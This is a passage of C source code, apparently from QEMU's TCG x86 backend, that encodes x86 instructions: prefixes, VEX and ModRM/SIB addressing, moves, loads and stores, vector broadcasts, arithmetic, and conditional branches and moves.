} #else static void tcg_out_opc(TCGContext *s, int opc) { if (opc & P_DATA16) { tcg_out8(s, 0x66); } if (opc & P_SIMDF3) { tcg_out8(s, 0xf3); } else if (opc & P_SIMDF2) { tcg_out8(s, 0xf2); } if (opc & (P_EXT | P_EXT38 | P_EXT3A)) { tcg_out8(s, 0x0f); if (opc & P_EXT38) { tcg_out8(s, 0x38); } else if (opc & P_EXT3A) { tcg_out8(s, 0x3a); } } tcg_out8(s, opc); } /* Discard the register arguments to tcg_out_opc early, so as not to penalize the 32-bit compilation paths. This method works with all versions of gcc, whereas relying on optimization may not be able to exclude them. */ #define tcg_out_opc(s, opc, r, rm, x) (tcg_out_opc)(s, opc) #endif static void tcg_out_modrm(TCGContext *s, int opc, int r, int rm) { tcg_out_opc(s, opc, r, rm, 0); tcg_out8(s, 0xc0 | (LOWREGMASK(r) << 3) | LOWREGMASK(rm)); } static void tcg_out_vex_opc(TCGContext *s, int opc, int r, int v, int rm, int index) { int tmp = 0; /* Use the two byte form if possible, which cannot encode VEX.W, VEX.B, VEX.X, or an m-mmmm field other than P_EXT. */ if ((opc & (P_EXT | P_EXT38 | P_EXT3A | P_REXW)) == P_EXT && ((rm | index) & 8) == 0) { /* Two byte VEX prefix. */ tcg_out8(s, 0xc5); tmp = (r & 8 ? 0 : 0x80); /* VEX.R */ } else { /* Three byte VEX prefix. */ tcg_out8(s, 0xc4); /* VEX.m-mmmm */ if (opc & P_EXT3A) { tmp = 3; } else if (opc & P_EXT38) { tmp = 2; } else if (opc & P_EXT) { tmp = 1; } else { g_assert_not_reached(); } tmp |= (r & 8 ? 0 : 0x80); /* VEX.R */ tmp |= (index & 8 ? 0 : 0x40); /* VEX.X */ tmp |= (rm & 8 ? 0 : 0x20); /* VEX.B */ tcg_out8(s, tmp); tmp = (opc & P_REXW ? 
0x80 : 0); /* VEX.W */ } tmp |= (opc & P_VEXL ? 0x04 : 0); /* VEX.L */ /* VEX.pp */ if (opc & P_DATA16) { tmp |= 1; /* 0x66 */ } else if (opc & P_SIMDF3) { tmp |= 2; /* 0xf3 */ } else if (opc & P_SIMDF2) { tmp |= 3; /* 0xf2 */ } tmp |= (~v & 15) << 3; /* VEX.vvvv */ tcg_out8(s, tmp); tcg_out8(s, opc); } static void tcg_out_vex_modrm(TCGContext *s, int opc, int r, int v, int rm) { tcg_out_vex_opc(s, opc, r, v, rm, 0); tcg_out8(s, 0xc0 | (LOWREGMASK(r) << 3) | LOWREGMASK(rm)); } /* Output an opcode with a full "rm + (index<<shift) + offset" address mode. We handle either RM and INDEX missing with a negative value. In 64-bit mode for absolute addresses, ~RM is the size of the immediate operand that will follow the instruction. */ static void tcg_out_sib_offset(TCGContext *s, int r, int rm, int index, int shift, intptr_t offset) { int mod, len; if (index < 0 && rm < 0) { if (TCG_TARGET_REG_BITS == 64) { /* Try for a rip-relative addressing mode. This has replaced the 32-bit-mode absolute addressing encoding. */ intptr_t pc = (intptr_t)s->code_ptr + 5 + ~rm; intptr_t disp = offset - pc; if (disp == (int32_t)disp) { tcg_out8(s, (LOWREGMASK(r) << 3) | 5); tcg_out32(s, disp); return; } /* Try for an absolute address encoding. This requires the use of the MODRM+SIB encoding and is therefore larger than rip-relative addressing. */ if (offset == (int32_t)offset) { tcg_out8(s, (LOWREGMASK(r) << 3) | 4); tcg_out8(s, (4 << 3) | 5); tcg_out32(s, offset); return; } /* ??? The memory isn't directly addressable. */ g_assert_not_reached(); } else { /* Absolute address. */ tcg_out8(s, (r << 3) | 5); tcg_out32(s, offset); return; } } /* Find the length of the immediate addend. Note that the encoding that would be used for (%ebp) indicates absolute addressing. */ if (rm < 0) { mod = 0, len = 4, rm = 5; } else if (offset == 0 && LOWREGMASK(rm) != TCG_REG_EBP) { mod = 0, len = 0; } else if (offset == (int8_t)offset) { mod = 0x40, len = 1; } else { mod = 0x80, len = 4; } /* Use a single byte MODRM format if possible. Note that the encoding that would be used for %esp is the escape to the two byte form. */ if (index < 0 && LOWREGMASK(rm) != TCG_REG_ESP) { /* Single byte MODRM format. */ tcg_out8(s, mod | (LOWREGMASK(r) << 3) | LOWREGMASK(rm)); } else { /* Two byte MODRM+SIB format. */ /* Note that the encoding that would place %esp into the index field indicates no index register. In 64-bit mode, the REX.X bit counts, so %r12 can be used as the index. */ if (index < 0) { index = 4; } else { tcg_debug_assert(index != TCG_REG_ESP); } tcg_out8(s, mod | (LOWREGMASK(r) << 3) | 4); tcg_out8(s, (shift << 6) | (LOWREGMASK(index) << 3) | LOWREGMASK(rm)); } if (len == 1) { tcg_out8(s, offset); } else if (len == 4) { tcg_out32(s, offset); } } static void tcg_out_modrm_sib_offset(TCGContext *s, int opc, int r, int rm, int index, int shift, intptr_t offset) { tcg_out_opc(s, opc, r, rm < 0 ? 0 : rm, index < 0 ? 0 : index); tcg_out_sib_offset(s, r, rm, index, shift, offset); } static void tcg_out_vex_modrm_sib_offset(TCGContext *s, int opc, int r, int v, int rm, int index, int shift, intptr_t offset) { tcg_out_vex_opc(s, opc, r, v, rm < 0 ? 0 : rm, index < 0 ? 0 : index); tcg_out_sib_offset(s, r, rm, index, shift, offset); } /* A simplification of the above with no index or shift. 
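   Passing -1 as the index selects the no-index encoding in
   tcg_out_sib_offset.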
*/ static inline void tcg_out_modrm_offset(TCGContext *s, int opc, int r, int rm, intptr_t offset) { tcg_out_modrm_sib_offset(s, opc, r, rm, -1, 0, offset); } static inline void tcg_out_vex_modrm_offset(TCGContext *s, int opc, int r, int v, int rm, intptr_t offset) { tcg_out_vex_modrm_sib_offset(s, opc, r, v, rm, -1, 0, offset); } /* Output an opcode with an expected reference to the constant pool. */ static inline void tcg_out_modrm_pool(TCGContext *s, int opc, int r) { tcg_out_opc(s, opc, r, 0, 0); /* Absolute for 32-bit, pc-relative for 64-bit. */ tcg_out8(s, LOWREGMASK(r) << 3 | 5); tcg_out32(s, 0); } /* Output an opcode with an expected reference to the constant pool. */ static inline void tcg_out_vex_modrm_pool(TCGContext *s, int opc, int r) { tcg_out_vex_opc(s, opc, r, 0, 0, 0); /* Absolute for 32-bit, pc-relative for 64-bit. */ tcg_out8(s, LOWREGMASK(r) << 3 | 5); tcg_out32(s, 0); } /* Generate dest op= src. Uses the same ARITH_* codes as tgen_arithi. */ static inline void tgen_arithr(TCGContext *s, int subop, int dest, int src) { /* Propagate an opcode prefix, such as P_REXW. */ int ext = subop & ~0x7; subop &= 0x7; tcg_out_modrm(s, OPC_ARITH_GvEv + (subop << 3) + ext, dest, src); } static bool tcg_out_mov(TCGContext *s, TCGType type, TCGReg ret, TCGReg arg) { int rexw = 0; if (arg == ret) { return true; } switch (type) { case TCG_TYPE_I64: rexw = P_REXW; /* fallthru */ case TCG_TYPE_I32: if (ret < 16) { if (arg < 16) { tcg_out_modrm(s, OPC_MOVL_GvEv + rexw, ret, arg); } else { tcg_out_vex_modrm(s, OPC_MOVD_EyVy + rexw, arg, 0, ret); } } else { if (arg < 16) { tcg_out_vex_modrm(s, OPC_MOVD_VyEy + rexw, ret, 0, arg); } else { tcg_out_vex_modrm(s, OPC_MOVQ_VqWq, ret, 0, arg); } } break; case TCG_TYPE_V64: tcg_debug_assert(ret >= 16 && arg >= 16); tcg_out_vex_modrm(s, OPC_MOVQ_VqWq, ret, 0, arg); break; case TCG_TYPE_V128: tcg_debug_assert(ret >= 16 && arg >= 16); tcg_out_vex_modrm(s, OPC_MOVDQA_VxWx, ret, 0, arg); break; case TCG_TYPE_V256: tcg_debug_assert(ret >= 16 && arg >= 16); tcg_out_vex_modrm(s, OPC_MOVDQA_VxWx | P_VEXL, ret, 0, arg); break; default: g_assert_not_reached(); } return true; } static const int avx2_dup_insn[4] = { OPC_VPBROADCASTB, OPC_VPBROADCASTW, OPC_VPBROADCASTD, OPC_VPBROADCASTQ, }; static bool tcg_out_dup_vec(TCGContext *s, TCGType type, unsigned vece, TCGReg r, TCGReg a) { if (have_avx2) { int vex_l = (type == TCG_TYPE_V256 ? P_VEXL : 0); tcg_out_vex_modrm(s, avx2_dup_insn[vece] + vex_l, r, 0, a); } else { switch (vece) { case MO_8: /* ??? With zero in a register, use PSHUFB. */ tcg_out_vex_modrm(s, OPC_PUNPCKLBW, r, a, a); a = r; /* FALLTHRU */ case MO_16: tcg_out_vex_modrm(s, OPC_PUNPCKLWD, r, a, a); a = r; /* FALLTHRU */ case MO_32: tcg_out_vex_modrm(s, OPC_PSHUFD, r, 0, a); /* imm8 operand: all output lanes selected from input lane 0. */ tcg_out8(s, 0); break; case MO_64: tcg_out_vex_modrm(s, OPC_PUNPCKLQDQ, r, a, a); break; default: g_assert_not_reached(); } } return true; } static bool tcg_out_dupm_vec(TCGContext *s, TCGType type, unsigned vece, TCGReg r, TCGReg base, intptr_t offset) { if (have_avx2) { int vex_l = (type == TCG_TYPE_V256 ? 
P_VEXL : 0); tcg_out_vex_modrm_offset(s, avx2_dup_insn[vece] + vex_l, r, 0, base, offset); } else { switch (vece) { case MO_64: tcg_out_vex_modrm_offset(s, OPC_MOVDDUP, r, 0, base, offset); break; case MO_32: tcg_out_vex_modrm_offset(s, OPC_VBROADCASTSS, r, 0, base, offset); break; case MO_16: tcg_out_vex_modrm_offset(s, OPC_VPINSRW, r, r, base, offset); tcg_out8(s, 0); /* imm8 */ tcg_out_dup_vec(s, type, vece, r, r); break; case MO_8: tcg_out_vex_modrm_offset(s, OPC_VPINSRB, r, r, base, offset); tcg_out8(s, 0); /* imm8 */ tcg_out_dup_vec(s, type, vece, r, r); break; default: g_assert_not_reached(); } } return true; } static void tcg_out_dupi_vec(TCGContext *s, TCGType type, TCGReg ret, tcg_target_long arg) { int vex_l = (type == TCG_TYPE_V256 ? P_VEXL : 0); if (arg == 0) { tcg_out_vex_modrm(s, OPC_PXOR, ret, ret, ret); return; } if (arg == -1) { tcg_out_vex_modrm(s, OPC_PCMPEQB + vex_l, ret, ret, ret); return; } if (TCG_TARGET_REG_BITS == 64) { if (type == TCG_TYPE_V64) { tcg_out_vex_modrm_pool(s, OPC_MOVQ_VqWq, ret); } else if (have_avx2) { tcg_out_vex_modrm_pool(s, OPC_VPBROADCASTQ + vex_l, ret); } else { tcg_out_vex_modrm_pool(s, OPC_MOVDDUP, ret); } new_pool_label(s, arg, R_386_PC32, s->code_ptr - 4, -4); } else { if (have_avx2) { tcg_out_vex_modrm_pool(s, OPC_VPBROADCASTW + vex_l, ret); } else { tcg_out_vex_modrm_pool(s, OPC_VBROADCASTSS, ret); } new_pool_label(s, arg, R_386_32, s->code_ptr - 4, 0); } } static void tcg_out_movi(TCGContext *s, TCGType type, TCGReg ret, tcg_target_long arg) { tcg_target_long diff; switch (type) { case TCG_TYPE_I32: #if TCG_TARGET_REG_BITS == 64 case TCG_TYPE_I64: #endif if (ret < 16) { break; } /* fallthru */ case TCG_TYPE_V64: case TCG_TYPE_V128: case TCG_TYPE_V256: tcg_debug_assert(ret >= 16); tcg_out_dupi_vec(s, type, ret, arg); return; default: g_assert_not_reached(); } if (arg == 0) { tgen_arithr(s, ARITH_XOR, ret, ret); return; } if (arg == (uint32_t)arg || type == TCG_TYPE_I32) { tcg_out_opc(s, OPC_MOVL_Iv + LOWREGMASK(ret), 0, ret, 0); tcg_out32(s, arg); return; } if (arg == (int32_t)arg) { tcg_out_modrm(s, OPC_MOVL_EvIz + P_REXW, 0, ret); tcg_out32(s, arg); return; } /* Try a 7 byte pc-relative lea before the 10 byte movq. */ diff = arg - ((uintptr_t)s->code_ptr + 7); if (diff == (int32_t)diff) { tcg_out_opc(s, OPC_LEA | P_REXW, ret, 0, 0); tcg_out8(s, (LOWREGMASK(ret) << 3) | 5); tcg_out32(s, diff); return; } tcg_out_opc(s, OPC_MOVL_Iv + P_REXW + LOWREGMASK(ret), 0, ret, 0); tcg_out64(s, arg); } static inline void tcg_out_pushi(TCGContext *s, tcg_target_long val) { if (val == (int8_t)val) { tcg_out_opc(s, OPC_PUSH_Ib, 0, 0, 0); tcg_out8(s, val); } else if (val == (int32_t)val) { tcg_out_opc(s, OPC_PUSH_Iv, 0, 0, 0); tcg_out32(s, val); } else { tcg_abort(); } } static inline void tcg_out_mb(TCGContext *s, TCGArg a0) { /* Given the strength of x86 memory ordering, we only need care for store-load ordering. Experimentally, "lock orl $0,0(%esp)" is faster than "mfence", so don't bother with the sse insn. 
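   The sequence emitted below is just the LOCK prefix (0xf0)
   followed by an orl of immediate zero into 0(%esp).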
 */
    if (a0 & TCG_MO_ST_LD) {
        tcg_out8(s, 0xf0);
        tcg_out_modrm_offset(s, OPC_ARITH_EvIb, ARITH_OR, TCG_REG_ESP, 0);
        tcg_out8(s, 0);
    }
}

static inline void tcg_out_push(TCGContext *s, int reg)
{
    tcg_out_opc(s, OPC_PUSH_r32 + LOWREGMASK(reg), 0, reg, 0);
}

static inline void tcg_out_pop(TCGContext *s, int reg)
{
    tcg_out_opc(s, OPC_POP_r32 + LOWREGMASK(reg), 0, reg, 0);
}

static void tcg_out_ld(TCGContext *s, TCGType type, TCGReg ret,
                       TCGReg arg1, intptr_t arg2)
{
    switch (type) {
    case TCG_TYPE_I32:
        if (ret < 16) {
            tcg_out_modrm_offset(s, OPC_MOVL_GvEv, ret, arg1, arg2);
        } else {
            tcg_out_vex_modrm_offset(s, OPC_MOVD_VyEy, ret, 0, arg1, arg2);
        }
        break;
    case TCG_TYPE_I64:
        if (ret < 16) {
            tcg_out_modrm_offset(s, OPC_MOVL_GvEv | P_REXW, ret, arg1, arg2);
            break;
        }
        /* FALLTHRU */
    case TCG_TYPE_V64:
        /* There is no instruction that can validate 8-byte alignment.  */
        tcg_debug_assert(ret >= 16);
        tcg_out_vex_modrm_offset(s, OPC_MOVQ_VqWq, ret, 0, arg1, arg2);
        break;
    case TCG_TYPE_V128:
        /*
         * The gvec infrastructure asserts that v128 vector loads
         * and stores use a 16-byte aligned offset.  Validate that the
         * final pointer is aligned by using an insn that will SIGSEGV.
         */
        tcg_debug_assert(ret >= 16);
        tcg_out_vex_modrm_offset(s, OPC_MOVDQA_VxWx, ret, 0, arg1, arg2);
        break;
    case TCG_TYPE_V256:
        /*
         * The gvec infrastructure only requires 16-byte alignment,
         * so here we must use an unaligned load.
         */
        tcg_debug_assert(ret >= 16);
        tcg_out_vex_modrm_offset(s, OPC_MOVDQU_VxWx | P_VEXL,
                                 ret, 0, arg1, arg2);
        break;
    default:
        g_assert_not_reached();
    }
}

static void tcg_out_st(TCGContext *s, TCGType type, TCGReg arg,
                       TCGReg arg1, intptr_t arg2)
{
    switch (type) {
    case TCG_TYPE_I32:
        if (arg < 16) {
            tcg_out_modrm_offset(s, OPC_MOVL_EvGv, arg, arg1, arg2);
        } else {
            tcg_out_vex_modrm_offset(s, OPC_MOVD_EyVy, arg, 0, arg1, arg2);
        }
        break;
    case TCG_TYPE_I64:
        if (arg < 16) {
            tcg_out_modrm_offset(s, OPC_MOVL_EvGv | P_REXW, arg, arg1, arg2);
            break;
        }
        /* FALLTHRU */
    case TCG_TYPE_V64:
        /* There is no instruction that can validate 8-byte alignment.  */
        tcg_debug_assert(arg >= 16);
        tcg_out_vex_modrm_offset(s, OPC_MOVQ_WqVq, arg, 0, arg1, arg2);
        break;
    case TCG_TYPE_V128:
        /*
         * The gvec infrastructure asserts that v128 vector loads
         * and stores use a 16-byte aligned offset.  Validate that the
         * final pointer is aligned by using an insn that will SIGSEGV.
         */
        tcg_debug_assert(arg >= 16);
        tcg_out_vex_modrm_offset(s, OPC_MOVDQA_WxVx, arg, 0, arg1, arg2);
        break;
    case TCG_TYPE_V256:
        /*
         * The gvec infrastructure only requires 16-byte alignment,
         * so here we must use an unaligned store.
         */
        tcg_debug_assert(arg >= 16);
        tcg_out_vex_modrm_offset(s, OPC_MOVDQU_WxVx | P_VEXL,
                                 arg, 0, arg1, arg2);
        break;
    default:
        g_assert_not_reached();
    }
}

static bool tcg_out_sti(TCGContext *s, TCGType type, TCGArg val,
                        TCGReg base, intptr_t ofs)
{
    int rexw = 0;

    if (TCG_TARGET_REG_BITS == 64 && type == TCG_TYPE_I64) {
        if (val != (int32_t)val) {
            return false;
        }
        rexw = P_REXW;
    } else if (type != TCG_TYPE_I32) {
        return false;
    }
    tcg_out_modrm_offset(s, OPC_MOVL_EvIz | rexw, 0, base, ofs);
    tcg_out32(s, val);
    return true;
}

static void tcg_out_shifti(TCGContext *s, int subopc, int reg, int count)
{
    /* Propagate an opcode prefix, such as P_DATA16.
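       The SHIFT_* subopcode lives in the low three bits and is
       emitted in the ModRM reg field.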
*/ int ext = subopc & ~0x7; subopc &= 0x7; if (count == 1) { tcg_out_modrm(s, OPC_SHIFT_1 + ext, subopc, reg); } else { tcg_out_modrm(s, OPC_SHIFT_Ib + ext, subopc, reg); tcg_out8(s, count); } } static inline void tcg_out_bswap32(TCGContext *s, int reg) { tcg_out_opc(s, OPC_BSWAP + LOWREGMASK(reg), 0, reg, 0); } static inline void tcg_out_rolw_8(TCGContext *s, int reg) { tcg_out_shifti(s, SHIFT_ROL + P_DATA16, reg, 8); } static inline void tcg_out_ext8u(TCGContext *s, int dest, int src) { /* movzbl */ tcg_debug_assert(src < 4 || TCG_TARGET_REG_BITS == 64); tcg_out_modrm(s, OPC_MOVZBL + P_REXB_RM, dest, src); } static void tcg_out_ext8s(TCGContext *s, int dest, int src, int rexw) { /* movsbl */ tcg_debug_assert(src < 4 || TCG_TARGET_REG_BITS == 64); tcg_out_modrm(s, OPC_MOVSBL + P_REXB_RM + rexw, dest, src); } static inline void tcg_out_ext16u(TCGContext *s, int dest, int src) { /* movzwl */ tcg_out_modrm(s, OPC_MOVZWL, dest, src); } static inline void tcg_out_ext16s(TCGContext *s, int dest, int src, int rexw) { /* movsw[lq] */ tcg_out_modrm(s, OPC_MOVSWL + rexw, dest, src); } static inline void tcg_out_ext32u(TCGContext *s, int dest, int src) { /* 32-bit mov zero extends. */ tcg_out_modrm(s, OPC_MOVL_GvEv, dest, src); } static inline void tcg_out_ext32s(TCGContext *s, int dest, int src) { tcg_out_modrm(s, OPC_MOVSLQ, dest, src); } static inline void tcg_out_bswap64(TCGContext *s, int reg) { tcg_out_opc(s, OPC_BSWAP + P_REXW + LOWREGMASK(reg), 0, reg, 0); } static void tgen_arithi(TCGContext *s, int c, int r0, tcg_target_long val, int cf) { int rexw = 0; if (TCG_TARGET_REG_BITS == 64) { rexw = c & -8; c &= 7; } /* ??? While INC is 2 bytes shorter than ADDL $1, they also induce partial flags update stalls on Pentium4 and are not recommended by current Intel optimization manuals. */ if (!cf && (c == ARITH_ADD || c == ARITH_SUB) && (val == 1 || val == -1)) { int is_inc = (c == ARITH_ADD) ^ (val < 0); if (TCG_TARGET_REG_BITS == 64) { /* The single-byte increment encodings are re-tasked as the REX prefixes. Use the MODRM encoding. */ tcg_out_modrm(s, OPC_GRP5 + rexw, (is_inc ? EXT5_INC_Ev : EXT5_DEC_Ev), r0); } else { tcg_out8(s, (is_inc ? OPC_INC_r32 : OPC_DEC_r32) + r0); } return; } if (c == ARITH_AND) { if (TCG_TARGET_REG_BITS == 64) { if (val == 0xffffffffu) { tcg_out_ext32u(s, r0, r0); return; } if (val == (uint32_t)val) { /* AND with no high bits set can use a 32-bit operation. */ rexw = 0; } } if (val == 0xffu && (r0 < 4 || TCG_TARGET_REG_BITS == 64)) { tcg_out_ext8u(s, r0, r0); return; } if (val == 0xffffu) { tcg_out_ext16u(s, r0, r0); return; } } if (val == (int8_t)val) { tcg_out_modrm(s, OPC_ARITH_EvIb + rexw, c, r0); tcg_out8(s, val); return; } if (rexw == 0 || val == (int32_t)val) { tcg_out_modrm(s, OPC_ARITH_EvIz + rexw, c, r0); tcg_out32(s, val); return; } tcg_abort(); } static void tcg_out_addi(TCGContext *s, int reg, tcg_target_long val) { if (val != 0) { tgen_arithi(s, ARITH_ADD + P_REXW, reg, val, 0); } } /* Use SMALL != 0 to force a short forward branch. 
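   A short branch uses a one-byte (rel8) displacement; if a known
   target is out of rel8 range, tcg_abort() below catches it.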
*/ static void tcg_out_jxx(TCGContext *s, int opc, TCGLabel *l, int _small) { int32_t val, val1; if (l->has_value) { val = tcg_pcrel_diff(s, l->u.value_ptr); val1 = val - 2; if ((int8_t)val1 == val1) { if (opc == -1) { tcg_out8(s, OPC_JMP_short); } else { tcg_out8(s, OPC_JCC_short + opc); } tcg_out8(s, val1); } else { if (_small) { tcg_abort(); } if (opc == -1) { tcg_out8(s, OPC_JMP_long); tcg_out32(s, val - 5); } else { tcg_out_opc(s, OPC_JCC_long + opc, 0, 0, 0); tcg_out32(s, val - 6); } } } else if (_small) { if (opc == -1) { tcg_out8(s, OPC_JMP_short); } else { tcg_out8(s, OPC_JCC_short + opc); } tcg_out_reloc(s, s->code_ptr, R_386_PC8, l, -1); s->code_ptr += 1; } else { if (opc == -1) { tcg_out8(s, OPC_JMP_long); } else { tcg_out_opc(s, OPC_JCC_long + opc, 0, 0, 0); } tcg_out_reloc(s, s->code_ptr, R_386_PC32, l, -4); s->code_ptr += 4; } } static void tcg_out_cmp(TCGContext *s, TCGArg arg1, TCGArg arg2, int const_arg2, int rexw) { if (const_arg2) { if (arg2 == 0) { /* test r, r */ tcg_out_modrm(s, OPC_TESTL + rexw, arg1, arg1); } else { tgen_arithi(s, ARITH_CMP + rexw, arg1, arg2, 0); } } else { tgen_arithr(s, ARITH_CMP + rexw, arg1, arg2); } } static void tcg_out_brcond32(TCGContext *s, TCGCond cond, TCGArg arg1, TCGArg arg2, int const_arg2, TCGLabel *label, int _small) { tcg_out_cmp(s, arg1, arg2, const_arg2, 0); tcg_out_jxx(s, tcg_cond_to_jcc[cond], label, _small); } #if TCG_TARGET_REG_BITS == 64 static void tcg_out_brcond64(TCGContext *s, TCGCond cond, TCGArg arg1, TCGArg arg2, int const_arg2, TCGLabel *label, int _small) { tcg_out_cmp(s, arg1, arg2, const_arg2, P_REXW); tcg_out_jxx(s, tcg_cond_to_jcc[cond], label, _small); } #else /* XXX: we implement it at the target level to avoid having to handle cross basic blocks temporaries */ static void tcg_out_brcond2(TCGContext *s, const TCGArg *args, const int *const_args, int _small) { TCGLabel *label_next = gen_new_label(s); TCGLabel *label_this = arg_label(args[5]); switch(args[4]) { case TCG_COND_EQ: tcg_out_brcond32(s, TCG_COND_NE, args[0], args[2], const_args[2], label_next, 1); tcg_out_brcond32(s, TCG_COND_EQ, args[1], args[3], const_args[3], label_this, _small); break; case TCG_COND_NE: tcg_out_brcond32(s, TCG_COND_NE, args[0], args[2], const_args[2], label_this, _small); tcg_out_brcond32(s, TCG_COND_NE, args[1], args[3], const_args[3], label_this, _small); break; case TCG_COND_LT: tcg_out_brcond32(s, TCG_COND_LT, args[1], args[3], const_args[3], label_this, _small); tcg_out_jxx(s, JCC_JNE, label_next, 1); tcg_out_brcond32(s, TCG_COND_LTU, args[0], args[2], const_args[2], label_this, _small); break; case TCG_COND_LE: tcg_out_brcond32(s, TCG_COND_LT, args[1], args[3], const_args[3], label_this, _small); tcg_out_jxx(s, JCC_JNE, label_next, 1); tcg_out_brcond32(s, TCG_COND_LEU, args[0], args[2], const_args[2], label_this, _small); break; case TCG_COND_GT: tcg_out_brcond32(s, TCG_COND_GT, args[1], args[3], const_args[3], label_this, _small); tcg_out_jxx(s, JCC_JNE, label_next, 1); tcg_out_brcond32(s, TCG_COND_GTU, args[0], args[2], const_args[2], label_this, _small); break; case TCG_COND_GE: tcg_out_brcond32(s, TCG_COND_GT, args[1], args[3], const_args[3], label_this, _small); tcg_out_jxx(s, JCC_JNE, label_next, 1); tcg_out_brcond32(s, TCG_COND_GEU, args[0], args[2], const_args[2], label_this, _small); break; case TCG_COND_LTU: tcg_out_brcond32(s, TCG_COND_LTU, args[1], args[3], const_args[3], label_this, _small); tcg_out_jxx(s, JCC_JNE, label_next, 1); tcg_out_brcond32(s, TCG_COND_LTU, args[0], args[2], const_args[2], label_this, 
_small); break; case TCG_COND_LEU: tcg_out_brcond32(s, TCG_COND_LTU, args[1], args[3], const_args[3], label_this, _small); tcg_out_jxx(s, JCC_JNE, label_next, 1); tcg_out_brcond32(s, TCG_COND_LEU, args[0], args[2], const_args[2], label_this, _small); break; case TCG_COND_GTU: tcg_out_brcond32(s, TCG_COND_GTU, args[1], args[3], const_args[3], label_this, _small); tcg_out_jxx(s, JCC_JNE, label_next, 1); tcg_out_brcond32(s, TCG_COND_GTU, args[0], args[2], const_args[2], label_this, _small); break; case TCG_COND_GEU: tcg_out_brcond32(s, TCG_COND_GTU, args[1], args[3], const_args[3], label_this, _small); tcg_out_jxx(s, JCC_JNE, label_next, 1); tcg_out_brcond32(s, TCG_COND_GEU, args[0], args[2], const_args[2], label_this, _small); break; default: tcg_abort(); } tcg_out_label(s, label_next, s->code_ptr); } #endif static void tcg_out_setcond32(TCGContext *s, TCGCond cond, TCGArg dest, TCGArg arg1, TCGArg arg2, int const_arg2) { tcg_out_cmp(s, arg1, arg2, const_arg2, 0); tcg_out_modrm(s, OPC_SETCC | tcg_cond_to_jcc[cond], 0, dest); tcg_out_ext8u(s, dest, dest); } #if TCG_TARGET_REG_BITS == 64 static void tcg_out_setcond64(TCGContext *s, TCGCond cond, TCGArg dest, TCGArg arg1, TCGArg arg2, int const_arg2) { tcg_out_cmp(s, arg1, arg2, const_arg2, P_REXW); tcg_out_modrm(s, OPC_SETCC | tcg_cond_to_jcc[cond], 0, dest); tcg_out_ext8u(s, dest, dest); } #else static void tcg_out_setcond2(TCGContext *s, const TCGArg *args, const int *const_args) { TCGArg new_args[6]; TCGLabel *label_true, *label_over; memcpy(new_args, args+1, 5*sizeof(TCGArg)); if (args[0] == args[1] || args[0] == args[2] || (!const_args[3] && args[0] == args[3]) || (!const_args[4] && args[0] == args[4])) { /* When the destination overlaps with one of the argument registers, don't do anything tricky. */ label_true = gen_new_label(s); label_over = gen_new_label(s); new_args[5] = label_arg(label_true); tcg_out_brcond2(s, new_args, const_args+1, 1); tcg_out_movi(s, TCG_TYPE_I32, args[0], 0); tcg_out_jxx(s, JCC_JMP, label_over, 1); tcg_out_label(s, label_true, s->code_ptr); tcg_out_movi(s, TCG_TYPE_I32, args[0], 1); tcg_out_label(s, label_over, s->code_ptr); } else { /* When the destination does not overlap one of the arguments, clear the destination first, jump if cond false, and emit an increment in the true case. This results in smaller code. 
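       The condition is inverted below so that a single brcond2
       skips the increment whenever the original condition is false.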
 */
        tcg_out_movi(s, TCG_TYPE_I32, args[0], 0);

        label_over = gen_new_label(s);
        new_args[4] = tcg_invert_cond(new_args[4]);
        new_args[5] = label_arg(label_over);
        tcg_out_brcond2(s, new_args, const_args+1, 1);

        tgen_arithi(s, ARITH_ADD, args[0], 1, 0);
        tcg_out_label(s, label_over, s->code_ptr);
    }
}
#endif

static void tcg_out_cmov(TCGContext *s, TCGCond cond, int rexw,
                         TCGReg dest, TCGReg v1)
{
    if (have_cmov) {
        tcg_out_modrm(s, OPC_CMOVCC | tcg_cond_to_jcc[cond] | rexw, dest, v1);
    } else {
        TCGLabel *over = gen_new_label(s);
        tcg_out_jxx(s, tcg_cond_to_jcc[tcg_invert_cond(cond)], over, 1);
        tcg_out_mov(s, TCG_TYPE_I32, dest, v1);
        tcg_out_label(s, over, s->code_ptr);
    }
}

static void tcg_out_movcond32(TCGContext *s, TCGCond cond, TCGReg dest,
                              TCGReg c1, TCGArg c2, int const_c2,
                              TCGReg v1)
{
    tcg_out_cmp(s, c1, c2, const_c2, 0);
    tcg_out_cmov(s, cond, 0, dest, v1);
}

#if TCG_TARGET_REG_BITS == 64
static void tcg_out_movcond64(TCGContext *s, TCGCond cond, TCGReg dest,
                              TCGReg c1, TCGArg c2, int const_c2,
                              TCGReg v1)
{
    tcg_out_cmp(s, c1, c2, const_c2, P_REXW);
    tcg_out_cmov(s, cond, P_REXW, dest, v1);
}
#endif

static void tcg_out_ctz(TCGContext *s, int rexw, TCGReg dest, TCGReg arg1,
                        TCGArg arg2, bool const_a2)
{
    if (have_bmi1) {
        tcg_out_modrm(s, OPC_TZCNT + rexw, dest, arg1);
        if (const_a2) {
            tcg_debug_assert(arg2 == (rexw ? 64 : 32));
        } else {
            tcg_debug_assert(dest != arg2);
            tcg_out_cmov(s, TCG_COND_LTU, rexw, dest, arg2);
        }
    } else {
        tcg_debug_assert(dest != arg2);
        tcg_out_modrm(s, OPC_BSF + rexw, dest, arg1);
        tcg_out_cmov(s, TCG_COND_EQ, rexw, dest, arg2);
    }
}

static void tcg_out_clz(TCGContext *s, int rexw, TCGReg dest, TCGReg arg1,
                        TCGArg arg2, bool const_a2)
{
    if (have_lzcnt) {
        tcg_out_modrm(s, OPC_LZCNT + rexw, dest, arg1);
        if (const_a2) {
            tcg_debug_assert(arg2 == (rexw ? 64 : 32));
        } else {
            tcg_debug_assert(dest != arg2);
            tcg_out_cmov(s, TCG_COND_LTU, rexw, dest, arg2);
        }
    } else {
        tcg_debug_assert(!const_a2);
        tcg_debug_assert(dest != arg1);
        tcg_debug_assert(dest != arg2);
        /* Recall that the output of BSR is the index, not the count.  */
        tcg_out_modrm(s, OPC_BSR + rexw, dest, arg1);
        tgen_arithi(s, ARITH_XOR + rexw, dest, rexw ? 63 : 31, 0);
        /* Since we have destroyed the flags from BSR, we have to re-test.  */
        tcg_out_cmp(s, arg1, 0, 1, rexw);
        tcg_out_cmov(s, TCG_COND_EQ, rexw, dest, arg2);
    }
}

static void tcg_out_branch(TCGContext *s, int call, tcg_insn_unit *dest)
{
    intptr_t disp = tcg_pcrel_diff(s, dest) - 5;

    if (disp == (int32_t)disp) {
        tcg_out_opc(s, call ? OPC_CALL_Jz : OPC_JMP_long, 0, 0, 0);
        tcg_out32(s, disp);
    } else {
        /* rip-relative addressing into the constant pool.
           This is 6 + 8 = 14 bytes, as compared to using an
